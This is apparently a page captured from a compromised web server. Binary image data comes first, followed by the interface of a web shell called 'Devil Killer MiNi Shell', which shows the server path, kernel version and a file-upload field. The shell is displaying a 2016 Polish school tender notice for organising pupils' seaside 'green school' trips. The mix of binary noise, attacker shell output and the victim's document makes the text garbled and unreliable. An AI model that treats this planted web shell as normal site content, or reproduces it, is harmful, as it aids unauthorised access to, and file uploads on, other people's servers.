JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161227/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161227/373843-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://sp34.bip.edukacja.rybnik.eu/' target='_blank'>http://sp34.bip.edukacja.rybnik.eu/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 373843 - 2016
              z dnia 2016-12-27 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rybnik: na Zorganizowanie Zielonej szkoły dla uczniów klas III SP 34 z podziałem na zadania<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                tak
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Szkoła Podstawowa z Oddziałami Integracyjnymi Nr 34 im. Ireny Sendlerowej w Rybniku, krajowy numer identyfikacyjny
              24179947900000, ul.
              ul.Reymonta 
              69,
              44200  
              Rybnik, woj.
              śląskie, państwo
              Polska, tel.
              32 42 28 957, e-mail
              sp34_rybnik@wp.pl, faks
              32 42 28 957.
              <br />
              Adres strony internetowej (URL): http://www.miastorybnik.pl/sp34/<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                http://sp34.bip.edukacja.rybnik.eu/</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Jednostka oświatowa</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://sp34.bip.edukacja.rybnik.eu/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://sp34.bip.edukacja.rybnik.eu/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />forma pisemna<br />
                Adres:
                <br />Sekretariat Szkioły Podstawowej nr 34, ul. Reymonta 69, 44-200 Rybnik</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>na Zorganizowanie Zielonej szkoły dla uczniów klas III SP 34 z podziałem na zadania<br /><b>Numer referencyjny: </b>ZP.271.01.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>ZADANIE 1
2.1. Przedmiot zamówienia 
1)	Przedmiotem zamówienia jest: zorganizowanie zielonej szkoły dla uczniów klas III SP 34

2)	Uczestnicy: 
	35 dzieci (2 klasy), z tym że ich ilość może ulec zmianie  (w takim przypadku Zamawiający płaci za rzeczywistą ilość uczestników),
	4 opiekunów (bezpłatny pobyt)
3)	Miejsce  realizacji:
Wykonawca będzie zobowiązany do zorganizowania zielonej szkoły w miejscowości Darłówko  

4)	Termin realizacji:

14 dni (13 noclegów)  między końcem maja 2017 a pierwszą połową czerwca 2017r.

5)	Zamawiający przewiduje zakres zamówienia zgodnie z przepisami określonymi w:
a)	Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad organizowania i nadzorowania (Dz.U. z 1997r. Nr 12, poz 67 z późn. zm.).
b)	Rozporządzeniu Rady Ministrów z dnia 6 maja 1997r. w sprawie określania warunków w sprawie określania bezpieczeństwa osób przebywających w górach, kąpiących się, pływających i uprawiających sporty wodne (Dz.U.Nr 57, poz. 358).
c)	Ustawie z dnia 29 sierpnia 1997r. o usługach turystycznych (Dz.U z 2004 Nr 223, poz. 2268, z późn. zm.)

6)	Minimalne wymagania dotyczące obiektu wypoczynku:
Ogrodzony i bezpieczny dom wczasowy oddalony od plaży max 200 metrów, dostosowany dla osób niepełnosprawnych (dziecko na wózku).

7)	Wymagania dotyczące zakwaterowania:
a)	Wszystkie dzieci i wychowawcy rozmieszczeni w jednym budynku.
b)	Do dyspozycji uczestników powinny być pokoje: 2, 3 i 4  osobowe z pełnym węzłem sanitarnym (ubikacja, umywalka, prysznic), dla dziecka niepełnosprawnego i jego opiekuna pokój na parterze
c)	Wejście do budynku i do stołówki dostosowane dla dziecka na wózku
d)	W przypadku zmian pogodowych (znacznego obniżenia temperatury), Zamawiający zastrzega możliwość ogrzewania pomieszczeń centralnym ogrzewaniem, w których zakwaterowani będą uczestnicy bez naliczania dodatkowych kosztów.
e)	Oddzielne pokoje dla wychowawców.
f)	Stołówka w miejscu zakwaterowania.

8)	Wymagania dotyczące wyżywienia:
a)	Trzy posiłki dziennie - śniadanie, obiad i kolacja, -  dostosowane do potrzeb dzieci + podwieczorek podany do obiadu lub na wynos do rozdania przez wychowawcę.
b)	Wykonawca zapewni uczestnikom przez cały dzień nieograniczony dostęp do napojów (np. herbata, woda z sokiem).
c)	Napoje i suchy prowiant w trakcie całodniowych wycieczek oraz w drodze powrotnej do domu.
d)	Wykonawca zapewni obiad podany w porze kolacji w przypadku całodniowej wycieczki. 
e)	Wyżywienie będzie przygotowane w sposób zapewniający bezpieczeństwo żywności zgodnie z zasadami Hazard Analysis and Critiiicccal Control Points, zwanym "systemem HACCAP", a także Rozporządzeniem Ministra Zdrowia z dnia 26 lipca 2016r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz. I z 2016r., poz. 1154). W przypadku stosowania przez niektórych uczestników diety, wykonawca zobowiązany jest zapewnić dania zgodnie z wytycznymi danej diety. 

9)	Transport:
a)	Autokar o podwyższonym standardzie klasy Lux (klimatyzacja, WC, ciepła herbata, video) w obie strony, dopuszczony do ruchu i odpowiadający wymaganiom ustawy z dnia 6 września 2001r. o transporcie drogowym (Dz U z 2007r. Nr 125, poz.. 874 z późn. zm.), posiadający aktualny przegląd i ubezpieczenie, spełniający wszystkie wymogi bezpieczeństwa i kodeksu drogowego, obsługiwany przez dwóch wykwalifikowanych kierowców.
b)	Przejazd uczestników tylko w ciągu dnia.
c)	Zapewnienie wszystkim dzieciom i wychowawcom miejsca siedzącego w autokarze.

d)	Wykonawca zobowiązany jest ubezpieczyć dzieci i opiekunów od NNW w czasie podróży i w czasie pobytu na turnusie.
e)	Wykonawca przedstawi Zamawiającemu najpóźniej 7 dni przed rozpoczęciem Zielonej Szkoły kserokopię umowy ubezpieczenia.
f)	Wykonawca przed podpisaniem umowy przedstawi polisę ubezpieczeniową w oryginale oraz złoży kopię potwierdzoną za zgodność, lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę brutto złożonej oferty.

g)	Opieka medyczna.
a)	Wykonawca zobowiązany jest do zapewnienia odpowiedniej opieki medycznej zgodnie z obowiązującymi, w tym zakresie przepisami.
b)	Pielęgniarka z dyspozycyjnością 24h/dobę na terenie obiektu przez cały okres turnusu.
c)	Zapewnienie w koniecznych przypadkach opieki lekarskiej w ramach ubezpieczania zdrowotnego, polegającej na wezwaniu lekarza do Obiektu lub niezwłocznym dowiezieniu uczestnika zielonej szkoły do punktu opieki medycznej (przychodni lub szpitala) bezpłatnym transportem.
d)	Wykonawca zapewni zaopatrzenie ambulatorium obozowego w podstawowe leki i środki opatrunkowe.

h)	Zapewniona opieka rezydenta biura podróży przez cały okres pobytu dzieci.

i)	Zapewnienie przez organizatora opieki nocnej w budynku zakwaterowania:
Osoba/osoby pełniąca dyżur nocny w godzinach od 23.00 do 6.00  przez cały okres pobytu.

j)	Zarządzający obiektem zostanie pisemnie powiadomiony przed przyjazdem dzieci i wychowawców, jakie warunki mają być spełnione.

k)	W cenie oferty należy uwzględnić:
a)	świetlicę do zajęć, sala (pomieszczenie odrębne niż jadalnia), z możliwością prowadzenia zajęć edukacyjnych - z tablicą, kredą, stolikami.
b)	dostęp do materiałów plastycznych, jak papier i kredki,
c)	dostęp do placu zabaw z boiskami i sprzętu sportowego, np.: piłki, skakanki.


l)	Dodatkowe imprezy:
a)	Dyskoteki 4 do 5 razy (miejsce, sprzęt np. magnetofon) w terminach do uzgodnienia z wychowawcą,
b)	Ognisko z pieczeniem kiełbasek (minimum 2 razy)
c)	Dodatkowe zajęcia sportowe i specjalistyczne z animatorem

m)	W ramach programu Wykonawca zobowiązany jest do zorganizowania 2 wycieczek autokarowych z przewodnikiem:

a)	 Kołobrzeg:
- zwiedzanie miasta z przewodnikiem: Promenada, Pomnik Zaślubin z Morzem, Baszta Prochowa, Katedra, Latarnia Morska

b)	Darłowo:
- zwiedzanie portu, rejs statkiem po morzu.

Bilety wstępu i przewodnicy do proponowanych miejsc i obiektów mają być w cenie skierowania.

Niespełnienie w/w warunków spowoduje odrzucenie oferty.

ZADANIE 2

2.1. Przedmiot zamówienia 
2)	Przedmiotem zamówienia jest: zorganizowanie zielonej szkoły dla uczniów klas III SP 34

2 Uczestnicy:  
	58 dzieci (3 klasy), z tym że ich ilość może ulec zmianie  (w takim przypadku Zamawiający płaci za rzeczywistą ilość uczestników),
	6 opiekunów  bezpłatny pobyt wychowawców.

3 Miejsce  realizacji:
Wykonawca będzie zobowiązany do zorganizowania zielonej szkoły w miejscowości  Łeba.

4.	Termin realizacji:

14	ni (13 noclegów) w drugiej połowie maja 2017r.

5.Zamawiający przewiduje zakres zamówienia zgodnie z przepisami określonymi w:
a)	Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad organizowania i nadzorowania (Dz.U. z 1997r. Nr 12, poz 67 z późn. zm.).
b)	Rozporządzeniu Rady Ministrów z dnia 6 maja 1997r. w sprawie określania warunków w sprawie określania bezpieczeństwa osób przebywających w górach, kąpiących się, pływających i uprawiających sporty wodne (Dz.U.Nr 57, poz. 358).
c)	Ustawie z dnia 29 sierpnia 1997r. o usługach turystycznych (Dz.U z 2004 Nr 223, poz. 2268, z późn. zm.)

6	Minimalne wymagania dotyczące obiektu wypoczynku:
Ogrodzony i bezpieczny dom wczasowy oddalony od morza max 300 metrów.

7	Wymagania dotyczące zakwaterowania:
a)	Wszystkie dzieci i wychowawcy rozmieszczeni w jednym budynku.
b)	Do dyspozycji uczestników powinny być pokoje: 2, 3, 4 i 5  osobowe z pełnym węzłem sanitarnym (ubikacja, umywalka, prysznic), lub typu studio (2+2+ łazienka)
c)	W przypadku zmian pogodowych (znacznego obniżenia temperatury), Zamawiający zastrzega możliwość ogrzewania pomieszczeń centralnym ogrzewaniem, w których zakwaterowani będą uczestnicy bez naliczania dodatkowych kosztów.
d)	Oddzielne pokoje dla wychowawców.

8 Wymagania dotyczące wyżywienia:
a)	Trzy posiłki dziennie  śniadanie (szwedzki stół), obiad i kolacja, -  dostosowane do potrzeb dzieci + podwieczorek podany do obiadu lub na wynos do rozdania przez wychowawcę. Posiłki maja być smaczne, urozmaicone.
b)	Wykonawca zapewni uczestnikom przez cały dzień nieograniczony dostęp do napojów (np. herbata, woda z sokiem).
c)	Napoje i suchy prowiant w trakcie całodniowych wycieczek oraz w drodze powrotnej do domu.
d)	Wykonawca zapewni obiad podany w porze kolacji w przypadku całodniowej wycieczki. 
e)	Wyżywienie będzie przygotowane w sposób zapewniający bezpieczeństwo żywności zgodnie z zasadami Hazard Analysis and Critiiicccal Control Points, zwanym "systemem HACCAP", a także Rozporządzeniem Ministra Zdrowia z dnia 26 lipca 2016r. w sprawie grup środków spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia zbiorowego dzieci i młodzieży w tych jednostkach (Dz. I z 2016r., poz. 1154). W przypadku stosowania przez niektórych uczestników diety, wykonawca zobowiązany jest zapewnić dania zgodnie z wytycznymi danej diety. 

9 Transport:
a)	Autokar o podwyższonym standardzie klasy Lux (klimatyzacja, WC, ciepła herbata, video) w obie strony, dopuszczony do ruchu i odpowiadający wymaganiom ustawy z dnia 6 września 2001r. o transporcie drogowym (Dz U z 2007r. Nr 125, poz.. 874 z późn. zm.), posiadający aktualny przegląd i ubezpieczenie, spełniający wszystkie wymogi bezpieczeństwa i kodeksu drogowego, obsługiwany przez dwóch wykwalifikowanych kierowców.
b)	Przejazd uczestników tylko w ciągu dnia.
c)	Zapewnienie wszystkim dzieciom i wychowawcom miejsca siedzącego w autokarze.

d)	Wykonawca zobowiązany jest ubezpieczyć dzieci i opiekunów od NNW w czasie podróży i w czasie pobytu na turnusie.
e)	Wykonawca przedstawi Zamawiającemu najpóźniej 7 dni przed rozpoczęciem Zielonej Szkoły kserokopię umowy ubezpieczenia.
f)	Wykonawca przed podpisaniem umowy przedstawi polisę ubezpieczeniową w oryginale oraz złoży kopię potwierdzoną za zgodność, lub inny dokument ubezpieczenia potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę brutto złożonej oferty.

10 Opieka medyczna.
e)	Wykonawca zobowiązany jest do zapewnienia odpowiedniej opieki medycznej zgodnie z obowiązującymi, w tym zakresie przepisami.
f)	Pielęgniarka z dyspozycyjnością 24h/dobę na terenie obiektu przez cały okres turnusu.
g)	Zapewnienie w koniecznych przypadkach opieki lekarskiej w ramach ubezpieczania zdrowotnego, polegającej na wezwaniu lekarza do Obiektu lub niezwłocznym dowiezieniu uczestnika zielonej szkoły do punktu opieki medycznej (przychodni lub szpitala) bezpłatnym transportem.
h)	Wykonawca zapewni zaopatrzenie ambulatorium obozowego w podstawowe leki i środki opatrunkowe. Lekarstwa wg recept w kwocie skierowania (od witamin po antybiotyki).
i)	Wykonawca zobowiązuje się do konsultacji telefonicznej z rodzicem/opiekunem w przypadkach nagłej konieczności podania uczestnikowi zielonej szkoły odpowiednich leków.

11	Zapewniona opieka rezydenta biura podróży przez cały okres pobytu dzieci.

12	Zapewnienie przez organizatora opieki nocnej w budynku zakwaterowania:
Osoba/osoby pełniąca dyżur nocny w godzinach od 23.00 do 6.00-przez cały okres pobytu.

13	Do dyspozycji grupy cenę oferty należy uwzględnić:
a)	salę dydaktyczną wyposażoną audiowizualnie, salę do zajęć dydaktycznych-świetlica
b)	 dostęp do materiałów plastycznych, jak papier i kredki,
c)	dostęp do placu zabaw, boisk do piłki nożnej i siatkówki i sprzętu sportowego

14	Dodatkowe imprezy:
a)	Dyskoteki 2-3 (miejsce, sprzęt np. magnetofon) w terminach do uzgodnienia z wychowawcą.
b)	Ognisko z pieczeniem kiełbasek
c)	Chrzest morski
d)	Animacje kulturalno-oświatowe (zajęcia plastyczne, karaoke, chusta animacyjna),
e)	Zajęcia sportowe  gry zespołowe, zajęcia lekkoatletyczne
f)	Sea Park (wizyta w fokarium  pokaz tresury  i karmienia fok, wizyta w prehistorycznym oceanarium), miniatury latarni morskich.

15	W ramach programu Wykonawca zobowiązany jest do zorganizowania wycieczek:
a) wycieczka autokarowa z pilotem do Trójmiasta-Gdyna-Sopot-Gdańsk
b) wycieczka do Słowiańskiego parku narodowego,
c) rejs statkiem po morzu

Bilety wstępu i przewodnicy do proponowanych miejsc i obiektów mają być w cenie oferty.
Uwzględnienie wymagań w zakresie dostępności dla osób niepełnosprawnych.
Niespełnienie w/w warunków spowoduje odrzucenie oferty.

2.2	Zleceniodawca przewiduje w okresie wiosennym wpłatę zaliczki maksymalnie 50 %. 

2.3	Pozostałe warunki zamówienia.
Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo i opiekę nad dziećmi w czasie podróży, jak i pobytu, w ramach kosztów ujętych w oferowanej cenie.

Składana oferta na oba zadania musi uwzględniać wszystkie koszty związane z w/w warunkami określonymi przez zamawiającego.
<br /><br /><b>II.5) Główny kod CPV: </b>63500000-4<br /><b> Dodatkowe kody CPV:</b>55240000-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 14<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                wykonawca składający ofertę musi figurować w rejestrze organizatorów turystyki i pośredników turystycznych zgodnie z ustawą z dnia 29 sierpnia 1997r. o usługach turystycznych (tj.. z 2004 r. Dz U Nr 223, poz. 2268 ze zm.) prowadzonym przez Marszałka Województwa właściwego ze względu na siedzibę przedsiębiorcy.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Na podstawie dokumentu oraz oświadczenia wykonawcy o spełnieniu warunku udziału w .postępowaniu<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Na podstawie dokumentu oraz oświadczenia wykonawcy o  spełnieniu warunku udziału w postępowaniu

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                b)Wykonawca wykaże się, że dysponuje lub będzie dysponował osobami odpowiedzialnymi za świadczenie usług zgodnie z wymogami określonymi w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r. nr 12 poz. 67 z póź. zm.), w zakresie odpowiednich specjalności do: 
kierowania placówkami wypoczynku dzieci i młodzieży (przynajmniej 1 osoba) pełniąca funkcję rezydenta wyjazdu posiadająca doświadczenie, na co najmniej 3 wyjazdach Zielonej Szkoły, w okresie ostatnich trzech lat. 
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
